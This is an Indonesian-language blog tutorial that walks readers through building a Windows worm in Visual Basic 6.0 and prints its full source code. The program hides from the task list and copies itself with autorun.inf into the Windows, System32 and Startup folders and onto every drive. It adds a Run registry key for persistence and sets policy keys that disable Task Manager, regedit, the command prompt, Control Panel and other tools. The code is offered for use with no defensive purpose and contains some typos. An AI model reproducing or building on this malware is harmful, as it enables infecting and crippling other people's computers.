Contoh Program Virus Menggunakan Visual Basic 6.0

Ehm hai sobat apa kabar.? mudah”an alhamdulilah, luar biasa, dahsyat, Allahhu Akbar yach..!! Lama gx bikin artikel kali ini topan mau bikin artikel mengenai contoh program virus komputer nich sobat. Oke deh langsung z yach coz puuuaaaaaaannnnnnnnjang bgt.. heu.. Yang harus dipersiapkan..

1. PC/Laptop/NotBook.
2. Visual Basic 6.0 mau portable mau instaler silahkan bebas.. heu..

Oh ia catatan kalau sobat membuat/mempraktekannya di Komputer sendiri maka jangan sekali” dijalankan/di running yach coz topan gx mau tanggung jawab and topan juga gx tau antivirusnya apaan.. wkwk.

Siap” proses pembuatan, ikutin tahap-tahapnya yach.. jangan sampai keliru..

1. Buka Visual Basic 6.0-File-New-Standart.exe. property Form namenya ganti jadi FVirus.

2. Masukan object timer dan label. untuk object timer ganti property intervalnya menjadi 1000.

Nah object timer ini berfungsi untuk mendukung penggandaan file sobat, menginfeksi flashdisk juga bisa. sekali flashdisk di tancapkan dan di open di exproler wah berabe dah.. heu serem kan..??

Nah untuk coding pertama silahkan masukan listing program berikut ini, sobat double klik di object timer. untuk baris yang dikasih tanda “//” gx ush di tulis ntar programnya error.. oke..

//Private Sub Timer1_Timer()
Label1.Caption = Time()
InfeksiDriveRemovable
//End Sub

Keterangan : Nah procedure diatas di buat karena adanya control timer yang akan terus memantau aktifitas sobat” semua juga dengan adanya timer ini program akan terus berjalan selama Komputer ada dalam keadaan menyala, kemudian untuk penyebaran media flashdisk maka program akan memanggil fungsi InfeksiDriveRemovable yang ada pada modul (coding untuk modul di bawah), sedangkan property interval pada object timer yang nilainya 1000 berfungsi untuk penyebaran virusnya menjadi 1 virus/10 detik sobat.. dapat dimengti dan mudah kan.? ah mudah ko.!!

3. Nah untuk coding kedua silahkan sobat double klik di object form kemudian tulis listing program berikut. Tapi ingat” seperti biasa baris yang dikasih tanda // jangan ikut di tulis yach.

//Private Sub Form_Load()
App.TaskVisible = False
Main
//End Sub

Keterangan : Nah procedure ini berfungsi untuk menyembunyikan program dari taskmanager dan dari taskbar sobat, ya maksudnya kan agar program tidak terlihat dan tidak dapat di close.. ngerti kan.? ngerti lah gampang ini.. heu..

4. Tambahkan suatu module sobat caranya klik project-add module.

Kemudian tambahkan semua coding yang ada di bawah ke modul tersebut, inget baris yang di kasih tanda “//” gx usah ditulis oke. (ah di ingetin mulu. heu.

// Mulai

// Fungsi ini digunakan untuk penggandaan file sobat, baik itu hardisk maupun flashdisk.

Public Declare Function CopyFile Lib “Kernel32” (ByVal lpExistingFileName As String, ByVal lpNemFileName As String, ByVal bFailIfExists As Long) As Long

// Fungsi ini digunakan untuk penggandaan virus pada folder tujuan, misal kalau sobat berada dalam suatu folder “A” selama 10 detik maka virus akan menggandakan ke folder tersebut.

Public Declare Function SHGetSpecialFolderLocation Lib “Shell32.dll” (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long

// Fungsi ini digunakan untuk mendapatkan daftar alamt folder yang ada pada Komputer sobat.

Public Declare Function SHGetPathFromIDList Lib “Shell32.dll” (ByVal pidl As Long, ByVal pszPath As String) As Long

// Fungsi ini digunakan khusus untuk penggandaan virus ke folder system32 sobat.

Public Declare Function GetSystemDirectory Lib “Kernel32.dll” (ByVal lpBuffer As String, ByVal nSize As Long) As Long

// Fungsi ini digunakan untuk menginfeksi folder windows (disini nich yang paling bahaya) sobat.

Public Declare Function GetWindowDirectory Lib “Kernel32.dll” (ByVal lpBuffer As String, ByVal nSize As Long) As Long

// Fungsi ini digunakan untuk mendeteksi drive yang terpasang pada Komputer, setelah suatu drive di deteksi maka akan di proses lebih lanjut sama si virus sobat.

Public Declare Function GetDriveType Lib “Kernel32” (ByVal nDrive As String) As Long

// Fungsi ini merupakan pengaturan atribut si virus agar keberadaanya sulit untuk diketahui sobat.

Public Declare Function SetFileAttributes Lib “Kernel32” (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long

// Fungsi ini dimaksudkan untuk pengaturan atribut file, juga pengecekan alamat folder sobat.

Public Declare Function GetFileAttributes Lib “Kernel32″ (ByVal lpFileName As String) As Long

Public Type SHITEMID
Ned As Long
Ju As Byte
End Type

Public Type ITEMIDLIST
Uned As SHITEMID
End Type

Enum SFolder
CSIDL_STARTUP = &H7
End Enum

Public Const FILE_ATTRIBUTE_READONLY = &H1
Public Const FILE_ATTRIBUTE_HIDDEN = &H2

// procedure ini digunakan untuk memanggil fungsi” yang udah kita buat tadi seperti penggandaan file, registri dll.

Public Sub Main()
On Error Resume Next
InfeksiFolderSystem
InfeksiDriveRemovable
AturAtributFile
InfeksiRegistry
End Sub

// Fungsi ini digunakan untuk penggandaan file beserta alamat file tersebut.

Public Function GetFileSumber() As String
On Error Resume Next
GetFileSumber = App.Path & “\” & App.EXEName & “.exe”
End Function

// Fungsi ini digunakan untuk keperluan untuk penggandaan file ke folder tertentu sobat.

Public Function GetSpecialFolder(JenisFolder As SFolder) As String
Dim Jun1 As Long, IDL As ITEMIDLIST
Jun1 = SHGetSpecialFolderLocation(100, JenisFolder, IDL)
If Jun1 = NOERROR Then
Path$ = Space$(512)
Jun1 = SHGetPathFromIDList(ByVal IDL.Uned.Ned, ByVal Path$)
GetSpecialFolder = Left$(Path, InStr(Path, Chr$(0)) – 1) & “\”
Exit Function
End If
GetSpecialFolde = “”
End Function

// Fungsi ini digunakan untuk penggandaan file ke folder system32.

Public Function GetSystemPath() As String
On Error Resume Next
Dim Buffer As String * 255, Ned1 As Long
Ned1 = GetSystemDirectory(Buffer, 255)
GetSystemPath = Left(Buffer, Ned1) & “\”
End Function

// Fungsi ini digunakan untuk penggandaan file ke folder window.

Public Function GetWindowPath() As String
On Error Resume Next
Dim Buffer As String * 255, Ned1 As Long
Ned1 = GetWindowDirectory(Buffer, 255)
GetWindowPath = Left(Buffer, Ned1) & “\”
End Function

// Fungsi ini digunakan untuk infeksi ke bagian” folder system, juga menginfeksi bagian folder berdasarkan drive yang terpasang.

Public Function InfeksiFolderSystem() As String
On Error Resume Next
CopyFile GetFileSumber, GetWindowPath & “FVirus.exe”, 0
CopyFile GetFileSumber, GetSystemPath & “FVirus.exe”, 0
CopyFile GetFileSumber, GetSpecialFolder(CSIDL_STARTUP) & “FVirus.exe”, 0
CopyFile App.Path & “\” & “autorun.inf”, GetWinwodPath & “autorun.inf”, 0
CopyFile App.Path & “\” & “autorun.inf”, GetSystemPath & “autorun.inf”, 0
CopyFile App.Path & “\” & “autorun.inf”, GetSpecialFolder(CSIDL_STARTUP) & “autorunif.inf”, 0
End Function

Public Function InfeksiDriveRemovable() As String
Dim DriveAscii As Integer, DriveHuruf As String
DriveHuruf = “”
For DriveAscii = 66 To 99
DriveHuruf = Chr(DriveAscii) & “:\”
If GetDriveType(DriveHuruf) = 3 Or GetDriveType(DriveHuruf) = 2 Then
CopyFile GetFileSumber, DriveHuruf & “FVirus.exe”, 0
CopyFile App.Path & “\” & “autorun.inf”, DriveHuruf & “autorun.inf”, 0
End If
Next
End Function

// Fungsi ini digunakan saat penggandaan file berhasil di eksekusi.

Public Function AturAtributFile() As String
Dim DriveAscii As Integer, DriveHuruf As String
DriveHuruf = “”
For DriveAscii = 66 To 99
DriveHuruf = Chr(DriveAscii) & “:\”
If GetDriveType(DriveHuruf) = 3 Or GetDriveType(DriveHuruf) = 2 Then
SetFileAttributes DriveHuruf & “FVirus.exe”, FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
End If
Next
SetFileAttributes GetWindowPath & “FVirus.exe”, FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
SetFileAttributes GetSystemPath & “FVirus.exe”, FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
SetFileAttributes GetSpecialFolder(CSIDL_STARTUP) & “FVirus.exe”, FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
End Function

// Nah ini fungsi untuk menginfeksi registry.

Public Function InfeksiRegistry()
Dim WShell As Object, RG1 As String, RG2 As String
Dim Rg3 As String, RG4 As String
RG1 = “Software\Microsoft\Windows\CurrentVersion\”
RG2 = “Software\Microsoft\Windows NT\CurrentVersion\”
Rg3 = “Software\Microsoft\Internet Explorer\Main\”
RG4 = “Software\Policies\Microsoft\Windows\System\”
Set WShell = CreateObject(“WScript.Shell”)

WShell.RegWrite “HKLM\” & RG2 & “\RegistryOwner”, “Virus”
WShell.RegWrite “HKLM\” & RG2 & “\RegistryOrganization”, “F”
WShell.RegWrite “HKCU\” & Rg3 & “\Window Title”, “::F::Virus::”
WShell.RegWrite “HKLM\” & RG1 & “\Run\FVirus”, GetWindowPath & “FVirus.exe”
WShell.RegWrite “HKCU\” & RG4 & “DisableCMD”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\System\DisableTaskMgr”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\System\DisableRegistryTools”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\System\DisableMsConfig”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Advanced\Hidden”, “0”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoRun”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoFind”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoFolderOptions”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoClose”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoControlPanel”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoViewContextMenu”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoStartMenuMorePrograms”, “1”, “REG_DWORD”
WShell.RegWrite “HKCU\” & RG1 & “Policies\Explorer\NoViewOnDrive”, “1”, “REG_DWORD”
Set WShell = Nothing
End Function

//Selesai

Kemudian semua form, module n projectnya dengan nama form = FFVirus, module = MFVirus, project = PFVirus, untuk mengcomfile program menjadi exe supaya bisa langsung dijalankan tanpa menggunakan Visual Basic klik File-Make project.exe.

Referensi : Junaidi.

Ehm cukup sekian dech sobat saya takut kesiangan nich kuliah. dadah.

Semoga Bermanfaat.
SmileyCentral.com

10 comments on “Contoh Program Virus Menggunakan Visual Basic 6.0

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s